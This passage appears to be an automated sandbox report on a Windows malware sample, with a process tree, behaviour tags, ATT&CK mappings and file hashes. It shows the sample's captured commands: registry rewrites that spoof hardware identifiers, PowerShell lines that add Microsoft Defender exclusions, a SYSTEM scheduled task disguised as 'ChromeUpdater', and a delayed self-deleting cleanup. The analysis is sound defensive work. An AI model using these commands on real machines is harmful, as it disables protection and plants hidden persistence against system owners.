- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe"C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe" C:\Windows\SoftwareDistribution\Download\lmPSqyuhFhCTtppmzwJiYUsDQWRnbg.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe"C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\smchyip.bat""4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:320
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:1724
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:2284
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:1660
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:1900
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:1824
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:988
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f5⤵
- System Location Discovery: System Language Discovery
PID:1700
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 4B9DFEFD1407B10C /f5⤵
- System Location Discovery: System Language Discovery
PID:328
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2860
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 9613114-8d2abece-A /f5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1708
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1896
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1676
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2900
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1972
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1496
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2044
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1796
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2168
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:2232 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"6⤵
- System Location Discovery: System Language Discovery
PID:2400
-
-
-
-
-
C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe"C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
C:\Users\Admin\AppData\Local\Microsoft\ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe"C:\Users\Admin\AppData\Local\Microsoft\ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe" C:\Users\Admin\AppData\Local\Microsoft\tyiylPcxklhZAVjKpERcvWbMoQWacj.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Users\Admin\AppData\Local\Microsoft\JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe"C:\Users\Admin\AppData\Local\Microsoft\JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dkrhbdc.bat""4⤵
- System Location Discovery: System Language Discovery
PID:2780 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:2644
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:2736
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:1612
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:2960
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f5⤵
- System Location Discovery: System Language Discovery
PID:1668
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 89C9B7FCA98C0941 /f5⤵
- System Location Discovery: System Language Discovery
PID:2552
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2808
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 4841653-05866bce-A /f5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1616
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3012
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1536
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1460
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:892
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2816
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:964
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1664
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:772
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:1484 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"6⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
-
-
-
C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe"C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:988
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1608
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"2⤵PID:1576
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe"2⤵PID:612
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:700
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:352 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2964
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2204
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2224
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"2⤵PID:2052
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe"2⤵PID:2376
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2532
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1032 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1808
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F1BB6EF0-03E5-4C98-A873-19D458AD76E7} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
PID:2380 -
C:\Program Files\Google\Chrome\ChromeUpdater.exe"C:\Program Files\Google\Chrome\ChromeUpdater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2940
-
-
C:\Program Files\Google\Chrome\ChromeUpdater.exe"C:\Program Files\Google\Chrome\ChromeUpdater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:2388
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
Filesize
9.8MB
MD5f0d66591cc208003b04be406c2ea8420
SHA106458ca23059df3117666cb4a64dc2e26f9daf97
SHA256927f00ec370ff3aa74cb58bcd118e6198f1945fe7691f8f73f3feaa046dcfb5d
SHA512cf67d6eaac9bc848297df4b4f67ff6ef606161b1e9198af6a7f5430a240ca261503c23bb2c15b386a1b421181a399531a3735739a2b860beb18f5e8ea5c01c6a
-
Filesize
3KB
MD5060a9d492eb13b842aad02350b1e7284
SHA138be5b02a8db6bcc884ab9968cc6e968933cef0c
SHA256ef7848cafcc9287ec535cc0f98cd26257f03f4dea69e5f175cba8d7629b2075a
SHA512eade10f9e1099b16f7d2361c4a7d7ed23ca211a6b24fb786f9d348416ad5f998e6079ba82966f7e518fe22f80f4443c0026df6bc0812a349ddddc29b97618748
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD515af44c62405d18e9e5c2d9ae8a80e4c
SHA1b4644fdc5fce3b008be40361aa52350d04effb87
SHA2562e84d641fdeb1a899de017065f5b9a3422eb4f1767b3a76c302f0197b3995acb
SHA512001c1a94db2268f884317dc5b1dd459886d4da088ec77b7220ee7a6d61c09dffbcb34742d8e39b0f673ad426481fdb78333049f9ca22e3cd1793ee8e2c8b2c4f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD520c60be47bddc04eb931a20ac002a9e7
SHA190493b7ab377f41922905e2596da0ee2c0ad9539
SHA2563548396a6adb6249bea50792f481d9043a916e8b6c8e371ddbe7883a0afc9cc9
SHA512f1bcc059ce222065c6417f26c280f8bb1b309b0a38610838b4e6ee7ba3155e317836efc1bc452c82e0f3c6cc8f94558904fe935fa6e0f9f6ebeb637336035ffa
-
Filesize
133KB
MD5b789be46d520694943db87140ba6edb6
SHA13cc6c4ac64112a771ccd3235e313dcfcdc7a78d9
SHA256a6195edcc520035e9baf76f120fa62909ccea148a3a4596d81cda06e08fef962
SHA512648d70c844d4425c5a83882836ea65067e54eed181d355e950a267da5ad92343ef08a4cb4eccfe45aa8561be94ac686807c867d0e0cb438ddf5988e502923d34
-
Filesize
595KB
MD569b8138d0e9dd6b169043520330bceac
SHA1aabe9458e1751623e727fb775e923103a02afe7a
SHA25601825f4cb340163af8d9f803a31dc20c1e33404ced73e17dbf74896d7ec1c34b
SHA512fa135dfec349bc9a3fd8348b2a60352a01ef27d73505550291953b2274994aff88a614fd225b97c2824fa05e91580ac7dd2292065a99514d17f731c0711574d0
-
Filesize
201KB
MD5d4f11c9a6a07f2a9ec69bc367b9243be
SHA163a5efac9bee6e1fd7de45fe10b5768c8fd9e382
SHA2560dcf580f5f74465642419ae9f8c56ea2cb4116d8d2c37f4ee4e3dcd45c50f1f0
SHA51214d061b2b6b486f0294c2228dd5badfbcd3296be59777449239201bcf3095b0c89eafe9e88683b1c924022ee795aee8e5b6483046a08d824f74d1061aa7846e0